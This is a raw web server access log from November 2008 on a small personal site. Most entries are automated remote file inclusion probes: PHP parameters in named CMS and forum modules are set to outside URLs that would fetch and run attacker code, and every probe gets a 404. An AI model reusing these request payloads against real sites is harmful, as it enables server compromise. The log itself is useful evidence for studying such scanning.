59.125.96.13 - - [03/Nov/2008:10:43:29 -0600] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
59.125.96.13 - - [03/Nov/2008:10:43:29 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
59.125.96.13 - - [03/Nov/2008:10:43:30 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:10:44:12 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:10:44:13 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:10:45:33 -0600] "GET /logs/access_log.1216425600/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:10:45:33 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:10:45:34 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
69.94.108.111 - - [03/Nov/2008:10:45:47 -0600] "GET /logs/access_log.1205366400%20%20//vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.94.108.111 - - [03/Nov/2008:10:47:46 -0600] "GET /logs/access_log.1208044800%20%20//vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
38.113.234.181 - - [03/Nov/2008:10:48:31 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""voyager/2.0 (http://www.kosmix.com/html/crawler.html)"
82.78.216.197 - - [03/Nov/2008:10:50:08 -0600] "GET /logs/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:10:50:09 -0600] "GET /errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:10:50:15 -0600] "GET /logs/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:10:50:15 -0600] "GET /errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
65.55.25.135 - - [03/Nov/2008:10:50:18 -0600] "GET /memorial/ HTTP/1.1" 200 817 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.13.217.217 - - [03/Nov/2008:10:50:40 -0600] "GET /logs/german.php?u=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
80.13.217.217 - - [03/Nov/2008:10:50:40 -0600] "GET /german.php?u=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:10:51:57 -0600] "GET /logs/german.php?u=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:10:51:58 -0600] "GET /german.php?u=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
70.85.114.130 - - [03/Nov/2008:10:52:07 -0600] "GET /logs//modules/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:10:52:08 -0600] "GET //modules/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
190.196.2.205 - - [03/Nov/2008:10:53:09 -0600] "GET /logs/access_log.1196035200/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:10:53:10 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:10:53:10 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:10:53:23 -0600] "GET /logs/german.php?u=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:10:53:24 -0600] "GET /german.php?u=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
69.94.108.111 - - [03/Nov/2008:10:53:33 -0600] "GET /logs/access_log.1205366400//vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.44.26 - - [03/Nov/2008:10:54:07 -0600] "GET /logs/german.php?u=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
222.236.44.26 - - [03/Nov/2008:10:54:08 -0600] "GET /german.php?u=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
195.210.42.40 - - [03/Nov/2008:10:56:05 -0600] "GET /logs/cms/modules/form.lib.php?sourceFolder=http://hucad.com/images/images.txt?? HTTP/1.0" 404 301 "-""libwww-perl/5.53"
195.210.42.40 - - [03/Nov/2008:10:56:05 -0600] "GET /cms/modules/form.lib.php?sourceFolder=http://hucad.com/images/images.txt?? HTTP/1.0" 404 296 "-""libwww-perl/5.53"
70.85.114.130 - - [03/Nov/2008:10:57:36 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:10:57:38 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
83.149.69.97 - - [03/Nov/2008:10:59:42 -0600] "GET /logs//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:10:59:42 -0600] "GET //content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
98.145.117.130 - - [03/Nov/2008:11:00:47 -0600] "GET /logs//include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:00:47 -0600] "GET //include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
202.179.180.41 - - [03/Nov/2008:11:01:23 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.41 - - [03/Nov/2008:11:01:23 -0600] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
98.145.117.130 - - [03/Nov/2008:11:01:32 -0600] "GET /logs//include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:01:32 -0600] "GET //include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:05:28 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:05:28 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:05:28 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:05:28 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
93.186.183.3 - - [03/Nov/2008:11:06:34 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:11:06:34 -0600] "GET ///vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:11:06:34 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.6.8.122 - - [03/Nov/2008:11:09:11 -0600] "GET /logs/access_log.1208476800 HTTP/1.0" 200 195416 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.69.97 - - [03/Nov/2008:11:11:01 -0600] "GET /logs/access_log.1214438400//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.149.69.97 - - [03/Nov/2008:11:11:01 -0600] "GET /logs//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.149.69.97 - - [03/Nov/2008:11:11:01 -0600] "GET //content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.149.69.97 - - [03/Nov/2008:11:11:06 -0600] "GET /logs/access_log.1215302400//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
216.180.251.34 - - [03/Nov/2008:11:11:36 -0600] "GET /logs//errors.php?error=http://www.gladtidingsfwbc.com//components/com_extcalendar/include/readme.jpg?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
216.180.251.34 - - [03/Nov/2008:11:11:36 -0600] "GET //errors.php?error=http://www.gladtidingsfwbc.com//components/com_extcalendar/include/readme.jpg?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
216.180.251.34 - - [03/Nov/2008:11:11:36 -0600] "GET /logs/access_log.1205366400//errors.php?error=http://www.gladtidingsfwbc.com//components/com_extcalendar/include/readme.jpg?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.76.137.5 - - [03/Nov/2008:11:11:36 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.76.137.5 - - [03/Nov/2008:11:11:36 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.40.52.28 - - [03/Nov/2008:11:11:57 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:11:57 -0600] "GET /logs/access_log.1205366400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:12:02 -0600] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:12:02 -0600] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:12:03 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:12:03 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:12:23 -0600] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:12:25 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.800"
216.180.251.34 - - [03/Nov/2008:11:12:28 -0600] "GET /logs/access_log.1208044800//errors.php?error=http://www.gladtidingsfwbc.com//components/com_extcalendar/include/readme.jpg?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
86.159.44.1 - - [03/Nov/2008:11:13:22 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.co.uk/search?hl=en&q=vintage+flash&btnG=Google+Search&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.159.44.1 - - [03/Nov/2008:11:13:22 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.159.44.1 - - [03/Nov/2008:11:13:22 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.246.55.229 - - [03/Nov/2008:11:13:55 -0600] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
216.246.55.229 - - [03/Nov/2008:11:13:56 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
216.246.55.229 - - [03/Nov/2008:11:13:57 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
66.40.52.28 - - [03/Nov/2008:11:14:53 -0600] "GET /logs/access_log.1205366400%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.800"
66.40.52.28 - - [03/Nov/2008:11:14:57 -0600] "GET /logs/access_log.1205366400%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.800"
196.12.157.26 - - [03/Nov/2008:11:15:17 -0600] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
196.12.157.26 - - [03/Nov/2008:11:15:17 -0600] "GET /logs/access_log.1205366400%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
196.12.157.26 - - [03/Nov/2008:11:15:17 -0600] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
196.12.157.26 - - [03/Nov/2008:11:15:50 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
196.12.157.26 - - [03/Nov/2008:11:15:58 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
196.12.157.26 - - [03/Nov/2008:11:15:58 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
196.12.157.26 - - [03/Nov/2008:11:16:44 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
116.122.158.45 - - [03/Nov/2008:11:17:43 -0600] "GET /logs//forum//language/lang_english/lang_activity.php?phpbb_root_path=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:17:43 -0600] "GET /logs//forum//language/lang_english/lang_activity.php?phpbb_root_path=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:17:44 -0600] "GET //forum//language/lang_english/lang_activity.php?phpbb_root_path=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:17:44 -0600] "GET //forum//language/lang_english/lang_activity.php?phpbb_root_path=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
196.12.157.26 - - [03/Nov/2008:11:17:52 -0600] "GET /logs/access_log.1205366400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
74.52.71.162 - - [03/Nov/2008:11:17:57 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
74.52.71.162 - - [03/Nov/2008:11:17:57 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
196.12.157.26 - - [03/Nov/2008:11:18:31 -0600] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
194.170.60.110 - - [03/Nov/2008:11:18:59 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
194.170.60.110 - - [03/Nov/2008:11:19:00 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
83.222.4.51 - - [03/Nov/2008:11:19:38 -0600] "GET /logs/access_log.1205366400/modify.php?dir_module=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:11:19:38 -0600] "GET /modify.php?dir_module=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:11:19:39 -0600] "GET /logs/modify.php?dir_module=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.195.37.172 - - [03/Nov/2008:11:21:59 -0600] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://s.webring.com/hub?ring=history;id=1163;prvw""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.55.229 - - [03/Nov/2008:11:23:42 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kamtiez_family2000/kontol.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
216.246.55.229 - - [03/Nov/2008:11:23:42 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kamtiez_family2000/kontol.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
65.55.208.122 - - [03/Nov/2008:11:24:01 -0600] "GET /logs/access_log.1169510400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.122.158.45 - - [03/Nov/2008:11:24:16 -0600] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:17 -0600] "GET //skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:17 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:20 -0600] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:20 -0600] "GET //skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:21 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:26 -0600] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
116.122.158.45 - - [03/Nov/2008:11:24:27 -0600] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.clubrexton.net/zboard//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
196.12.157.26 - - [03/Nov/2008:11:24:50 -0600] "GET /logs/access_log.1205366400%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://auction.arizonatraders.net/admin/us/V7ID.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
60.195.249.153 - - [03/Nov/2008:11:25:09 -0600] "GET //skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
60.195.249.153 - - [03/Nov/2008:11:25:09 -0600] "GET /logs/access_log.1208044800//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
60.195.249.153 - - [03/Nov/2008:11:25:09 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.222.4.51 - - [03/Nov/2008:11:26:25 -0600] "GET /logs/access_log.1208044800/modify.php?dir_module=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
98.145.117.130 - - [03/Nov/2008:11:26:58 -0600] "GET /logs/access_log.1214956800//include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:26:58 -0600] "GET //include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:26:59 -0600] "GET /logs//include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:27:01 -0600] "GET /logs/access_log.1214956800//include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:27:01 -0600] "GET //include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:27:01 -0600] "GET /logs//include/write.php?dir=http://usuarios.lycos.es/idsusah.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
98.145.117.130 - - [03/Nov/2008:11:27:12 -0600] "GET /logs/access_log.12164